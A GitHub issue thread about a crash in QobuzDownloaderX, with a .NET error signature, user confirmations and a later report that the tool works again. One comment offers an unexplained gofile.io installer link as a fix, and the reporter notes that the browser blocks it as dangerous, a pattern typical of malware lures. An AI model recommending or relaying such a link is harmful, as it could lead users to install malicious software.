### ISSUE TITLE
QBDLX has suddenly stopped working

### ISSUE THREAD

**Issue by neilwilkes** [ImAiiR/QobuzDownloaderX#154]
Problem signature:
  Problem Event Name:	CLR20r3
  Problem Signature 01:	QobuzDownloaderX.exe
  Problem Signature 02:	0.9.9.24
  Problem Signature 03:	6412625c
  Problem Signature 04:	System
  Problem Signature 05:	4.7.3062.0
  Problem Signature 06:	5ab952a7
  Problem Signature 07:	a10
  Problem Signature 08:	e3
  Problem Signature 09:	System.Net.Http.HttpRequest
  OS Version:	6.1.7601.2.1.0.256.48
  Locale ID:	2057
  Additional Information 1:	0a9e
  Additional Information 2:	0a9e372d3b4ad19135b953a78882e789
  Additional Information 3:	0a9e
  Additional Information 4:	0a9e372d3b4ad19135b953a78882e789

**Comment by YousefNabil8** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by neilwilkes** [comment]
Anybody got any ideas why? My QoBuz account is still valid, and I can access the browser but no loger able to download.

**Comment by neilwilkes** [comment]
> try this https://gofile.io/d/yMHabA select the desired compiler in the installer

What's this? Unable to download it because it is apparently dangerous

**Comment by vad62** [comment]
I confirm the problem! I stopped logging in via email (the program stops), only via a token. After launching, the download does not work, it gives an error.

**Comment by neilwilkes** [comment]
If I try to get that gofile download, it gets blocked as 'dangerous' - can
I please ask for confirmation this is a good idea?

**Comment by neilwilkes** [comment]
And suddenly it is now working again.
